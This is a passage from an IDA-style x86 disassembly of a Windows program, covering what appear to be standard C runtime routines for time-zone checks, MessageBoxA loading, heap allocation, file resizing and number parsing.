loc_41EE1A: ; CODE XREF: sub_41EBF2+21E�j
movsx eax, byte ptr [esi]
cmp eax, ebp
mov ds:dword_431D34, eax
jz short loc_41EE42
push 3
push esi
push ds:off_431DC0
call sub_416D30
mov eax, ds:off_431DC0
add esp, 0Ch
and byte ptr [eax+3], 0
jmp short loc_41EE4A
; ---------------------------------------------------------------------------
loc_41EE42: ; CODE XREF: sub_41EBF2+10B�j
; sub_41EBF2+115�j ...
mov eax, ds:off_431DC0
and byte ptr [eax], 0
loc_41EE4A: ; CODE XREF: sub_41EBF2+40�j
; sub_41EBF2+124�j ...
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
sub_41EBF2 endp
; =============== S U B R O U T I N E =======================================
sub_41EE50 proc near ; CODE XREF: sub_41C2A6+A5�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor edi, edi
cmp ds:dword_431D34, edi
jnz short loc_41EE64
loc_41EE5D: ; CODE XREF: sub_41EE50+148�j
; sub_41EE50+150�j ...
xor eax, eax
jmp loc_41EFB0
; ---------------------------------------------------------------------------
loc_41EE64: ; CODE XREF: sub_41EE50+B�j
mov esi, [esp+0Ch+arg_0]
push 1
pop ebx
mov eax, [esi+14h]
cmp eax, ds:dword_431DC8
jnz short loc_41EE82
cmp eax, ds:dword_431DD8
jz loc_41EF84
loc_41EE82: ; CODE XREF: sub_41EE50+24�j
cmp ds:dword_4C9290, edi
jz loc_41EF5A
movzx ecx, ds:word_4C933E
push ecx
cmp ds:word_4C9330, di
movzx ecx, ds:word_4C933C
push ecx
movzx ecx, ds:word_4C933A
push ecx
movzx ecx, ds:word_4C9338
push ecx
jnz short loc_41EED4
movzx ecx, ds:word_4C9334
push edi
push ecx
movzx ecx, ds:word_4C9336
push ecx
movzx ecx, ds:word_4C9332
push ecx
push eax
push ebx
jmp short loc_41EEE8
; ---------------------------------------------------------------------------
loc_41EED4: ; CODE XREF: sub_41EE50+65�j
movzx ecx, ds:word_4C9336
push ecx
push edi
movzx ecx, ds:word_4C9332
push edi
push ecx
push eax
push edi
loc_41EEE8: ; CODE XREF: sub_41EE50+82�j
push ebx
call sub_41EFFC
movzx eax, ds:word_4C92EA
add esp, 2Ch
cmp ds:word_4C92DC, di
push eax
movzx eax, ds:word_4C92E8
push eax
movzx eax, ds:word_4C92E6
push eax
movzx eax, ds:word_4C92E4
push eax
jnz short loc_41EF42
movzx eax, ds:word_4C92E0
push edi
push eax
movzx eax, ds:word_4C92E2
push eax
movzx eax, ds:word_4C92DE
push eax
push dword ptr [esi+14h]
push ebx
loc_41EF37: ; CODE XREF: sub_41EE50+108�j
push edi
call sub_41EFFC
add esp, 2Ch
jmp short loc_41EF84
; ---------------------------------------------------------------------------
loc_41EF42: ; CODE XREF: sub_41EE50+C8�j
movzx eax, ds:word_4C92E2
push eax
push edi
movzx eax, ds:word_4C92DE
push edi
push eax
push dword ptr [esi+14h]
push edi
jmp short loc_41EF37
; ---------------------------------------------------------------------------
loc_41EF5A: ; CODE XREF: sub_41EE50+38�j
push edi
push edi
push edi
push 2
push edi
push edi
push ebx
push 4
push eax
push ebx
push ebx
call sub_41EFFC
push edi
push edi
push edi
push 2
push edi
push edi
push 5
push 0Ah
push dword ptr [esi+14h]
push ebx
push edi
call sub_41EFFC
add esp, 58h
loc_41EF84: ; CODE XREF: sub_41EE50+2C�j
; sub_41EE50+F0�j
mov edx, ds:dword_431DCC
mov eax, ds:dword_431DDC
mov ecx, [esi+1Ch]
cmp edx, eax
jge short loc_41EFB4
cmp ecx, edx
jl loc_41EE5D
cmp ecx, eax
jg loc_41EE5D
cmp ecx, edx
jle short loc_41EFC8
cmp ecx, eax
jge short loc_41EFC8
loc_41EFAE: ; CODE XREF: sub_41EE50+166�j
; sub_41EE50+16A�j
mov eax, ebx
loc_41EFB0: ; CODE XREF: sub_41EE50+F�j
; sub_41EE50+19D�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41EFB4: ; CODE XREF: sub_41EE50+144�j
cmp ecx, eax
jl short loc_41EFAE
cmp ecx, edx
jg short loc_41EFAE
cmp ecx, eax
jle short loc_41EFC8
cmp ecx, edx
jl loc_41EE5D
loc_41EFC8: ; CODE XREF: sub_41EE50+158�j
; sub_41EE50+15C�j ...
mov eax, [esi+8]
imul eax, 3Ch
add eax, [esi+4]
imul eax, 3Ch
add eax, [esi]
imul eax, 3E8h
cmp ecx, edx
jnz short loc_41EFEF
xor ecx, ecx
cmp eax, ds:dword_431DD0
setnl cl
loc_41EFEB: ; CODE XREF: sub_41EE50+1AA�j
mov eax, ecx
jmp short loc_41EFB0
; ---------------------------------------------------------------------------
loc_41EFEF: ; CODE XREF: sub_41EE50+18E�j
xor ecx, ecx
cmp eax, ds:dword_431DE0
setl cl
jmp short loc_41EFEB
sub_41EE50 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EFFC proc near ; CODE XREF: sub_41EE50+99�p
; sub_41EE50+E8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 1
push ebx
mov ebx, [ebp+arg_8]
push esi
jnz loc_41F097
mov eax, [ebp+arg_C]
mov [ebp+arg_8], ebx
and [ebp+arg_8], 3
mov esi, eax
jnz short loc_41F027
shl esi, 2
mov eax, ds:dword_431DE0[esi]
jmp short loc_41F030
; ---------------------------------------------------------------------------
loc_41F027: ; CODE XREF: sub_41EFFC+1E�j
shl esi, 2
mov eax, ds:dword_431E14[esi]
loc_41F030: ; CODE XREF: sub_41EFFC+29�j
mov edx, ebx
lea ecx, [eax+1]
imul edx, 16Dh
lea eax, [ebx-1]
push edi
sar eax, 2
mov edi, ecx
push 7
add edi, eax
lea eax, [edx+edi-63DBh]
pop edi
cdq
idiv edi
mov eax, [ebp+arg_10]
pop edi
cmp edx, [ebp+arg_14]
jg short loc_41F06A
imul eax, 7
sub eax, edx
add eax, [ebp+arg_14]
lea ecx, [ecx+eax-7]
jmp short loc_41F074
; ---------------------------------------------------------------------------
loc_41F06A: ; CODE XREF: sub_41EFFC+5E�j
imul eax, 7
sub eax, edx
add eax, [ebp+arg_14]
add ecx, eax
loc_41F074: ; CODE XREF: sub_41EFFC+6C�j
cmp [ebp+arg_10], 5
jnz short loc_41F0B2
cmp [ebp+arg_8], 0
jnz short loc_41F088
mov esi, ds:dword_431DE4[esi]
jmp short loc_41F08E
; ---------------------------------------------------------------------------
loc_41F088: ; CODE XREF: sub_41EFFC+82�j
mov esi, ds:dword_431E18[esi]
loc_41F08E: ; CODE XREF: sub_41EFFC+8A�j
cmp ecx, esi
jle short loc_41F0B2
sub ecx, 7
jmp short loc_41F0B2
; ---------------------------------------------------------------------------
loc_41F097: ; CODE XREF: sub_41EFFC+C�j
mov eax, [ebp+arg_C]
test bl, 3
jnz short loc_41F0A8
mov ecx, ds:dword_431DE0[eax*4]
jmp short loc_41F0AF
; ---------------------------------------------------------------------------
loc_41F0A8: ; CODE XREF: sub_41EFFC+A1�j
mov ecx, ds:dword_431E14[eax*4]
loc_41F0AF: ; CODE XREF: sub_41EFFC+AA�j
add ecx, [ebp+arg_18]
loc_41F0B2: ; CODE XREF: sub_41EFFC+7C�j
; sub_41EFFC+94�j ...
cmp [ebp+arg_0], 1
jnz short loc_41F0E3
mov eax, [ebp+arg_1C]
mov ds:dword_431DCC, ecx
imul eax, 3Ch
add eax, [ebp+arg_20]
mov ds:dword_431DC8, ebx
imul eax, 3Ch
add eax, [ebp+arg_24]
imul eax, 3E8h
add eax, [ebp+arg_28]
mov ds:dword_431DD0, eax
jmp short loc_41F138
; ---------------------------------------------------------------------------
loc_41F0E3: ; CODE XREF: sub_41EFFC+BA�j
mov eax, [ebp+arg_1C]
mov ds:dword_431DDC, ecx
imul eax, 3Ch
add eax, [ebp+arg_20]
imul eax, 3Ch
add eax, ds:dword_431D38
add eax, [ebp+arg_24]
imul eax, 3E8h
add eax, [ebp+arg_28]
mov ds:dword_431DE0, eax
jns short loc_41F11B
add eax, 5265C00h
dec ecx
mov ds:dword_431DE0, eax
jmp short loc_41F12C
; ---------------------------------------------------------------------------
loc_41F11B: ; CODE XREF: sub_41EFFC+110�j
mov edx, 5265C00h
cmp eax, edx
jl short loc_41F132
sub eax, edx
inc ecx
mov ds:dword_431DE0, eax
loc_41F12C: ; CODE XREF: sub_41EFFC+11D�j
mov ds:dword_431DDC, ecx
loc_41F132: ; CODE XREF: sub_41EFFC+126�j
mov ds:dword_431DD8, ebx
loc_41F138: ; CODE XREF: sub_41EFFC+E5�j
pop esi
pop ebx
pop ebp
retn
sub_41EFFC endp
; =============== S U B R O U T I N E =======================================
sub_41F13C proc near ; CODE XREF: sub_41D24F+2B�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_41F14D
add esp, 0Ch
retn
sub_41F13C endp
; =============== S U B R O U T I N E =======================================
sub_41F14D proc near ; CODE XREF: sub_41F13C+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test ds:byte_4CA5E1[eax], cl
jnz short loc_41F17A
cmp [esp+arg_4], 0
jz short loc_41F173
movzx eax, ds:word_42F36A[eax*2]
and eax, [esp+arg_4]
jmp short loc_41F175
; ---------------------------------------------------------------------------
loc_41F173: ; CODE XREF: sub_41F14D+16�j
xor eax, eax
loc_41F175: ; CODE XREF: sub_41F14D+24�j
test eax, eax
jnz short loc_41F17A
retn
; ---------------------------------------------------------------------------
loc_41F17A: ; CODE XREF: sub_41F14D+F�j
; sub_41F14D+2A�j
push 1
pop eax
retn
sub_41F14D endp
; =============== S U B R O U T I N E =======================================
sub_41F17E proc near ; CODE XREF: sub_41D9A5+11F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
xor ebx, ebx
cmp ds:dword_4C934C, ebx
push esi
push edi
jnz short loc_41F1CD
push offset aUser32_dll ; "user32.dll"
call ds:off_4220C0
mov edi, eax
cmp edi, ebx
jz short loc_41F203
mov esi, ds:off_4220BC
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; sub_4DB076
test eax, eax
mov ds:dword_4C934C, eax
jz short loc_41F203
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; sub_4DB076
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov ds:dword_4C9350, eax
call esi ; sub_4DB076
mov ds:dword_4C9354, eax
loc_41F1CD: ; CODE XREF: sub_41F17E+B�j
mov eax, ds:dword_4C9350
test eax, eax
jz short loc_41F1EC
call eax
mov ebx, eax
test ebx, ebx
jz short loc_41F1EC
mov eax, ds:dword_4C9354
test eax, eax
jz short loc_41F1EC
push ebx
call eax
mov ebx, eax
loc_41F1EC: ; CODE XREF: sub_41F17E+56�j
; sub_41F17E+5E�j ...
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push [esp+14h+arg_0]
push ebx
call ds:dword_4C934C
loc_41F1FF: ; CODE XREF: sub_41F17E+87�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41F203: ; CODE XREF: sub_41F17E+1C�j
; sub_41F17E+33�j
xor eax, eax
jmp short loc_41F1FF
sub_41F17E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F207 proc near ; CODE XREF: _0:0041DB84�p _0:0041DB9D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
imul esi, [ebp+arg_4]
cmp esi, 0FFFFFFE0h
push edi
mov [ebp+arg_0], esi
ja short loc_41F228
test esi, esi
jnz short loc_41F222
push 1
pop esi
loc_41F222: ; CODE XREF: sub_41F207+16�j
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_41F228: ; CODE XREF: sub_41F207+12�j
; sub_41F207+94�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja short loc_41F287
mov eax, ds:dword_4CA708
cmp eax, 3
jnz short loc_41F253
mov eax, [ebp+arg_0]
cmp eax, ds:dword_4CA700
ja short loc_41F272
push eax
call sub_4191FD
mov edi, eax
pop ecx
test edi, edi
jnz short loc_41F29D
jmp short loc_41F272
; ---------------------------------------------------------------------------
loc_41F253: ; CODE XREF: sub_41F207+30�j
cmp eax, 2
jnz short loc_41F272
cmp esi, ds:dword_4315A4
ja short loc_41F272
mov eax, esi
shr eax, 4
push eax
call sub_419CA0
mov edi, eax
pop ecx
test edi, edi
jnz short loc_41F2B1
loc_41F272: ; CODE XREF: sub_41F207+3B�j
; sub_41F207+4A�j ...
push esi
push 8
push ds:dword_4CA704
call ds:dword_4220C8 ; RtlAllocateHeap
mov edi, eax
test edi, edi
jnz short loc_41F2AB
loc_41F287: ; CODE XREF: sub_41F207+26�j
cmp ds:dword_4C90E4, 0
jz short loc_41F2AB
push esi
call sub_418C74
test eax, eax
pop ecx
jz short loc_41F2B4
jmp short loc_41F228
; ---------------------------------------------------------------------------
loc_41F29D: ; CODE XREF: sub_41F207+48�j
push [ebp+arg_0]
loc_41F2A0: ; CODE XREF: sub_41F207+AB�j
push 0
push edi
call sub_415500
add esp, 0Ch
loc_41F2AB: ; CODE XREF: sub_41F207+7E�j
; sub_41F207+87�j
mov eax, edi
loc_41F2AD: ; CODE XREF: sub_41F207+AF�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41F2B1: ; CODE XREF: sub_41F207+69�j
push esi
jmp short loc_41F2A0
; ---------------------------------------------------------------------------
loc_41F2B4: ; CODE XREF: sub_41F207+92�j
xor eax, eax
jmp short loc_41F2AD
sub_41F207 endp
; ---------------------------------------------------------------------------
loc_41F2B8: ; CODE XREF: _0:0041DC15�j
push esi
push edi
push 3
xor edi, edi
pop esi
cmp ds:dword_4CA3A0, esi
jle short loc_41F30B
loc_41F2C7: ; CODE XREF: _0:0041F309�j
mov eax, ds:dword_4C9380
mov eax, [eax+esi*4]
test eax, eax
jz short loc_41F302
test byte ptr [eax+0Ch], 83h
jz short loc_41F2E6
push eax
call sub_415AD0
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41F2E6
inc edi
loc_41F2E6: ; CODE XREF: _0:0041F2D7�j _0:0041F2E3�j
cmp esi, 14h
jl short loc_41F302
mov eax, ds:dword_4C9380
push dword ptr [eax+esi*4]
call sub_415DE1
mov eax, ds:dword_4C9380
pop ecx
and dword ptr [eax+esi*4], 0
loc_41F302: ; CODE XREF: _0:0041F2D1�j _0:0041F2E9�j
inc esi
cmp esi, ds:dword_4CA3A0
jl short loc_41F2C7
loc_41F30B: ; CODE XREF: _0:0041F2C5�j
mov eax, edi
pop edi
pop esi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F310 proc near ; CODE XREF: sub_41DFE6+271�p
var_1000 = byte ptr -1000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1000h
call sub_415D00
push ebx
mov ebx, [ebp+arg_0]
push esi
xor esi, esi
cmp ebx, ds:dword_4CA4C0
jnb loc_41F445
mov eax, ebx
mov ecx, ebx
sar eax, 5
and ecx, 1Fh
mov eax, ds:dword_4CA3C0[eax*4]
test byte ptr [eax+ecx*8+4], 1
jz loc_41F445
push 1
push esi
push ebx
call sub_41C637
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_41F44F
push 2
push esi
push ebx
call sub_41C637
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_41F44F
push edi
mov edi, [ebp+arg_4]
sub edi, eax
test edi, edi
jle short loc_41F3F2
push 1000h
lea eax, [ebp+var_1000]
push esi
push eax
call sub_415500
push 8000h
push ebx
call sub_41FF4A
add esp, 14h
mov [ebp+arg_4], eax
loc_41F3A6: ; CODE XREF: sub_41F310+BD�j
mov eax, 1000h
cmp edi, eax
jge short loc_41F3B1
mov eax, edi
loc_41F3B1: ; CODE XREF: sub_41F310+9D�j
push eax
lea eax, [ebp+var_1000]
push eax
push ebx
call sub_41CEB7
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_41F3CF
sub edi, eax
test edi, edi
jle short loc_41F3E5
jmp short loc_41F3A6
; ---------------------------------------------------------------------------
loc_41F3CF: ; CODE XREF: sub_41F310+B5�j
cmp ds:dword_4C9088, 5
jnz short loc_41F3E2
mov ds:dword_4C9084, 0Dh
loc_41F3E2: ; CODE XREF: sub_41F310+C6�j
or esi, 0FFFFFFFFh
loc_41F3E5: ; CODE XREF: sub_41F310+BB�j
push [ebp+arg_4]
push ebx
call sub_41FF4A
pop ecx
pop ecx
jmp short loc_41F432
; ---------------------------------------------------------------------------
loc_41F3F2: ; CODE XREF: sub_41F310+71�j
jge short loc_41F432
push 0
push [ebp+arg_4]
push ebx
call sub_41C637
push ebx
call sub_41DF52
add esp, 10h
push eax
call ds:dword_422010 ; SetEndOfFile
mov esi, eax
neg esi
sbb esi, esi
neg esi
dec esi
cmp esi, 0FFFFFFFFh
jnz short loc_41F432
mov ds:dword_4C9084, 0Dh
call ds:dword_42206C ; RtlGetLastWin32Error
mov ds:dword_4C9088, eax
loc_41F432: ; CODE XREF: sub_41F310+E0�j
; sub_41F310:loc_41F3F2�j ...
push 0
push [ebp+arg_0]
push ebx
call sub_41C637
add esp, 0Ch
mov eax, esi
pop edi
jmp short loc_41F452
; ---------------------------------------------------------------------------
loc_41F445: ; CODE XREF: sub_41F310+1A�j
; sub_41F310+36�j
mov ds:dword_4C9084, 9
loc_41F44F: ; CODE XREF: sub_41F310+4E�j
; sub_41F310+63�j
or eax, 0FFFFFFFFh
loc_41F452: ; CODE XREF: sub_41F310+133�j
pop esi
pop ebx
leave
retn
sub_41F310 endp
; =============== S U B R O U T I N E =======================================
sub_41F456 proc near ; CODE XREF: sub_41E451+2B�p
; sub_41E451+42�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_0]
push esi
mov esi, [esp+4+arg_4]
xor eax, eax
lea ecx, [edx+esi]
cmp ecx, edx
jb short loc_41F46C
cmp ecx, esi
jnb short loc_41F46F
loc_41F46C: ; CODE XREF: sub_41F456+10�j
push 1
pop eax
loc_41F46F: ; CODE XREF: sub_41F456+14�j
mov edx, [esp+4+arg_8]
pop esi
mov [edx], ecx
retn
sub_41F456 endp
; =============== S U B R O U T I N E =======================================
sub_41F477 proc near ; CODE XREF: sub_41F530+40�p
; sub_41F530+61�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
mov edi, [esp+8+arg_4]
push esi
push dword ptr [edi]
push dword ptr [esi]
call sub_41F456
add esp, 0Ch
test eax, eax
jz short loc_41F4A9
lea eax, [esi+4]
push eax
push 1
push dword ptr [eax]
call sub_41F456
add esp, 0Ch
test eax, eax
jz short loc_41F4A9
inc dword ptr [esi+8]
loc_41F4A9: ; CODE XREF: sub_41F477+19�j
; sub_41F477+2D�j
lea eax, [esi+4]
push eax
push dword ptr [edi+4]
push dword ptr [eax]
call sub_41F456
add esp, 0Ch
test eax, eax
jz short loc_41F4C1
inc dword ptr [esi+8]
loc_41F4C1: ; CODE XREF: sub_41F477+45�j
lea eax, [esi+8]
push eax
push dword ptr [edi+8]
push dword ptr [eax]
call sub_41F456
add esp, 0Ch
pop edi
pop esi
retn
sub_41F477 endp
; =============== S U B R O U T I N E =======================================
sub_41F4D5 proc near ; CODE XREF: sub_41F530+30�p
; sub_41F530+36�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push edi
mov esi, [eax]
mov edi, [eax+4]
mov ecx, esi
add esi, esi
mov [eax], esi
lea esi, [edi+edi]
shr ecx, 1Fh
or esi, ecx
mov ecx, [eax+8]
mov edx, edi
mov [eax+4], esi
shr edx, 1Fh
shl ecx, 1
or ecx, edx
pop edi
mov [eax+8], ecx
pop esi
retn
sub_41F4D5 endp
; =============== S U B R O U T I N E =======================================
sub_41F503 proc near ; CODE XREF: sub_41FAC8+1C8�p
; sub_41FFC0+17D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push edi
mov edx, [eax+8]
mov ecx, [eax+4]
mov esi, edx
mov edi, ecx
shl esi, 1Fh
shr ecx, 1
or ecx, esi
mov [eax+4], ecx
mov ecx, [eax]
shl edi, 1Fh
shr ecx, 1
shr edx, 1
or ecx, edi
pop edi
mov [eax+8], edx
mov [eax], ecx
pop esi
retn
sub_41F503 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F530 proc near ; CODE XREF: sub_41F5F7+3CA�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_8]
xor edx, edx
cmp eax, edx
push esi
mov [ebp+var_4], 404Eh
mov [ebx], edx
mov [ebx+4], edx
mov [ebx+8], edx
jbe short loc_41F5A4
push edi
mov [ebp+arg_8], eax
loc_41F557: ; CODE XREF: sub_41F530+6F�j
mov esi, ebx
lea edi, [ebp+var_10]
movsd
movsd
push ebx
movsd
call sub_41F4D5
push ebx
call sub_41F4D5
lea eax, [ebp+var_10]
push eax
push ebx
call sub_41F477
push ebx
call sub_41F4D5
mov eax, [ebp+arg_0]
and [ebp+var_C], 0
and [ebp+var_8], 0
movsx eax, byte ptr [eax]
mov [ebp+var_10], eax
lea eax, [ebp+var_10]
push eax
push ebx
call sub_41F477
add esp, 1Ch
inc [ebp+arg_0]
dec [ebp+arg_8]
jnz short loc_41F557
xor edx, edx
pop edi
loc_41F5A4: ; CODE XREF: sub_41F530+21�j
; sub_41F530+9F�j
cmp [ebx+8], edx
jnz short loc_41F5D1
mov ecx, [ebx+4]
mov eax, ecx
shr eax, 10h
mov [ebx+8], eax
mov eax, [ebx]
mov esi, eax
shr esi, 10h
shl ecx, 10h
or esi, ecx
shl eax, 10h
add [ebp+var_4], 0FFF0h
mov [ebx+4], esi
mov [ebx], eax
jmp short loc_41F5A4
; ---------------------------------------------------------------------------
loc_41F5D1: ; CODE XREF: sub_41F530+77�j
mov esi, 8000h
loc_41F5D6: ; CODE XREF: sub_41F530+B9�j
test [ebx+8], esi
jnz short loc_41F5EB
push ebx
call sub_41F4D5
add [ebp+var_4], 0FFFFh
pop ecx
jmp short loc_41F5D6
; ---------------------------------------------------------------------------
loc_41F5EB: ; CODE XREF: sub_41F530+A9�j
mov ax, word ptr [ebp+var_4]
pop esi
mov [ebx+0Ah], ax
pop ebx
leave
retn
sub_41F530 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F5F7 proc near ; CODE XREF: sub_41E79A+17�p
; sub_41E7C7+17�p
var_5C = byte ptr -5Ch
var_45 = byte ptr -45h
var_40 = dword ptr -40h
var_3A = dword ptr -3Ah
var_36 = dword ptr -36h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 5Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea eax, [ebp+var_5C]
push 1
mov [ebp+var_C], eax
xor eax, eax
pop edx
mov [ebp+var_28], eax
mov [ebp+var_18], edx
mov [ebp+var_4], eax
mov [ebp+var_10], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_2C], eax
mov [ebp+var_30], eax
mov [ebp+var_1C], eax
mov [ebp+var_8], eax
mov [ebp+var_14], eax
mov [ebp+arg_8], edi
loc_41F632: ; CODE XREF: sub_41F5F7+52�j
mov cl, [edi]
cmp cl, 20h
jz short loc_41F648
cmp cl, 9
jz short loc_41F648
cmp cl, 0Ah
jz short loc_41F648
cmp cl, 0Dh
jnz short loc_41F64B
loc_41F648: ; CODE XREF: sub_41F5F7+40�j
; sub_41F5F7+45�j ...
inc edi
jmp short loc_41F632
; ---------------------------------------------------------------------------
loc_41F64B: ; CODE XREF: sub_41F5F7+4F�j
push 4
pop esi
loc_41F64E: ; CODE XREF: sub_41F5F7+AE�j
; sub_41F5F7+B7�j ...
mov bl, [edi]
inc edi
cmp eax, 0Bh ; switch 12 cases
ja loc_41F8D1 ; default
; jumptable 0041F65A case 10
jmp off_41FA98[eax*4] ; switch jump
loc_41F661: ; DATA XREF: _0:off_41FA98�o
cmp bl, 31h ; jumptable 0041F65A case 0
jl short loc_41F672
cmp bl, 39h
jg short loc_41F672
loc_41F66B: ; CODE XREF: sub_41F5F7+C4�j
; sub_41F5F7+118�j
push 3
jmp loc_41F88F
; ---------------------------------------------------------------------------
loc_41F672: ; CODE XREF: sub_41F5F7+6D�j
; sub_41F5F7+72�j
cmp bl, ds:byte_42F570
jnz short loc_41F681
loc_41F67A: ; CODE XREF: sub_41F5F7+124�j
push 5
jmp loc_41F8C7
; ---------------------------------------------------------------------------
loc_41F681: ; CODE XREF: sub_41F5F7+81�j
movsx eax, bl
sub eax, 2Bh
jz short loc_41F6A7
dec eax
dec eax
jz short loc_41F69B
sub eax, 3
jnz loc_41F96A
jmp loc_41F72A
; ---------------------------------------------------------------------------
loc_41F69B: ; CODE XREF: sub_41F5F7+94�j
push 2
mov [ebp+var_28], 8000h
pop eax
jmp short loc_41F64E
; ---------------------------------------------------------------------------
loc_41F6A7: ; CODE XREF: sub_41F5F7+90�j
and [ebp+var_28], 0
push 2
pop eax
jmp short loc_41F64E
; ---------------------------------------------------------------------------
loc_41F6B0: ; CODE XREF: sub_41F5F7+63�j
; DATA XREF: _0:off_41FA98�o
cmp bl, 31h ; jumptable 0041F65A case 1
mov [ebp+var_10], edx
jl short loc_41F6BD
cmp bl, 39h
jle short loc_41F66B
loc_41F6BD: ; CODE XREF: sub_41F5F7+BF�j
cmp bl, ds:byte_42F570
jz loc_41F785
cmp bl, 2Bh
jz short loc_41F6FF
cmp bl, 2Dh
jz short loc_41F6FF
cmp bl, 30h
jz short loc_41F72A
loc_41F6D8: ; CODE XREF: sub_41F5F7+207�j
cmp bl, 43h
jle loc_41F96A
cmp bl, 45h
jle short loc_41F6F8
cmp bl, 63h
jle loc_41F96A
cmp bl, 65h
jg loc_41F96A
loc_41F6F8: ; CODE XREF: sub_41F5F7+ED�j
push 6
jmp loc_41F8C7
; ---------------------------------------------------------------------------
loc_41F6FF: ; CODE XREF: sub_41F5F7+D5�j
; sub_41F5F7+DA�j ...
dec edi
push 0Bh
jmp loc_41F8C7
; ---------------------------------------------------------------------------
loc_41F707: ; CODE XREF: sub_41F5F7+63�j
; DATA XREF: _0:off_41FA98�o
cmp bl, 31h ; jumptable 0041F65A case 2
jl short loc_41F715
cmp bl, 39h
jle loc_41F66B
loc_41F715: ; CODE XREF: sub_41F5F7+113�j
cmp bl, ds:byte_42F570
jz loc_41F67A
cmp bl, 30h
jnz loc_41F8DF
loc_41F72A: ; CODE XREF: sub_41F5F7+9F�j
; sub_41F5F7+DF�j
mov eax, edx
jmp loc_41F64E
; ---------------------------------------------------------------------------
loc_41F731: ; CODE XREF: sub_41F5F7+63�j
; DATA XREF: _0:off_41FA98�o
mov [ebp+var_10], edx ; jumptable 0041F65A case 3
loc_41F734: ; CODE XREF: sub_41F5F7+184�j
cmp ds:dword_42F56C, edx
jle short loc_41F74D
movzx eax, bl
push esi
push eax
call sub_418762
pop ecx
pop ecx
push 1
pop edx
jmp short loc_41F75B
; ---------------------------------------------------------------------------
loc_41F74D: ; CODE XREF: sub_41F5F7+143�j
mov ecx, ds:off_42F360
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_41F75B: ; CODE XREF: sub_41F5F7+154�j
test eax, eax
jz short loc_41F77D
cmp [ebp+var_4], 19h
jnb short loc_41F775
mov eax, [ebp+var_C]
inc [ebp+var_4]
sub bl, 30h
inc [ebp+var_C]
mov [eax], bl
jmp short loc_41F778
; ---------------------------------------------------------------------------
loc_41F775: ; CODE XREF: sub_41F5F7+16C�j
inc [ebp+var_8]
loc_41F778: ; CODE XREF: sub_41F5F7+17C�j
mov bl, [edi]
inc edi
jmp short loc_41F734
; ---------------------------------------------------------------------------
loc_41F77D: ; CODE XREF: sub_41F5F7+166�j
cmp bl, ds:byte_42F570
jnz short loc_41F7EC
loc_41F785: ; CODE XREF: sub_41F5F7+CC�j
mov eax, esi
jmp loc_41F64E
; ---------------------------------------------------------------------------
loc_41F78C: ; CODE XREF: sub_41F5F7+63�j
; DATA XREF: _0:off_41FA98�o
cmp [ebp+var_4], 0 ; jumptable 0041F65A case 4
mov [ebp+var_10], edx
mov [ebp+var_24], edx
jnz short loc_41F7A5
loc_41F798: ; CODE XREF: sub_41F5F7+1AC�j
cmp bl, 30h
jnz short loc_41F7A5
dec [ebp+var_8]
mov bl, [edi]
inc edi
jmp short loc_41F798
; ---------------------------------------------------------------------------
